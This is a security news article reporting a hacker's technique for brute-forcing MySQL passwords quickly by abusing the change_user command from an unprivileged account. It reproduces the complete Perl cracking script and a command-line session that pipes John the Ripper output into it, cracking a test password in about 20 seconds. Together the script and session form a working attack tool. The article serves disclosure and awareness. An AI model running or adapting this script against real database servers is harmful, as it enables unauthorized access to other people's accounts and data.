A hacker by the name of Kingcope has found another security problem with the popular MySQL database. Using an already well-known characteristic of the database's user management, it is possible to significantly increase the speed of a brute force attack. "Brute-forcing" typically involves trying out a huge number of possible passwords in order to guess the actual password of the user. Each password would be presented to the login process which can take time, and when thousands of passwords need to be processed, that time can become substantial.

What Kingcope has found, is a trick which allows him to test up to 5000 passwords per second over the network if he has some access to the database. For this, the attacker requires an unprivileged account for the database. The script uses that account to log in and then uses the command 'change_user' to attempt to change the account during the MySQL session. Unlike presenting the password to the login process, this works with an already established network connection and very quickly rejects incorrect passwords.

The hacker used the John The Ripper password cracker to create a password list and has documented the attack with a Perl script and record of a command line session. To crack a four-character password with remote access to the MySQL database took just 20 seconds with over 100,000 character combinations tested.

The example script

use Net::MySQL;



$|=1;



my $mysql = Net::MySQL->new(

hostname => '192.168.2.3',

database => 'test',

user => "user",

password => "secret",

debug => 0, );



$crackuser = "crackme";



while(<stdin>) {

chomp;

$currentpass = $_;

$vv = join "\0",

$crackuser,

"\x14".

Net::MySQL::Password->scramble(

$currentpass,

$mysql->{salt},

$mysql->{client_capabilities}

) . "\0";



if ($mysql->_execute_command("\x11", $vv) ne undef) {

print "[*] Cracked! --> $currentpass

";

exit;

}

}

The example session

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john

--incremental --stdout=5 | perl mysqlcrack.pl

Warning: MaxLen = 8 is too large for the current hash type, reduced to 5

words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH

words: 24573 time: 0:00:00:04 w/s: 4916 current: rap

words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3

words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429

words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141

words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n

words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2

[*] Cracked! --> pass

words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs

Session aborted

(djwm)